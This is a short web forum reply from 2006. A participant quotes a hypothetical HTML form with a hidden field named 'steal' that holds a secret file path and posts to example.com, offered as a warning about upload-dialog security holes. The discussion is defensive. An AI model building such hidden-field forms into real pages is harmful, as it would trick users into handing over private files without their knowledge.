|
|
Posted by Jay Blanchard on 01/19/06 15:35
[snip]
> Along these same lines, does anyone know how to make the file dialog
> start
> in a specific directory? I saw this the other day but forgot where. I
> clicked browse and the dialog popped up pointed to My Pictures (which
> at
> least works for most Windblows users). I meant to look at the code,
> but
> didn't....
Yikes!
If it *DOES* work, you've probably got yet another security problem in
Windows.
Suppose, for example, that I do something like this:
<form action="http://example.com/" method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
Who's your daddy? <input name="daddy"><br />
<input type="submit">
</form>
Now, the unsuspecting user will be HANDING me the file I shouldn't
have without ever seeing anything about it.
Even if it "only" lets you pick the directory, but not the file, it
probably exposes too much information about my desktop for my tastes.
[/snip]
Now I need to go back and find it. It was a site having to do with photos,
but I was doing research and visited a lot of them. Since the upload dialog
was looking for photos you can see where the apparent convenience could come
in. But you're right....as a security hole it is big enough for aircrafy
carrier usage.
Navigation:
[Reply to this message]
|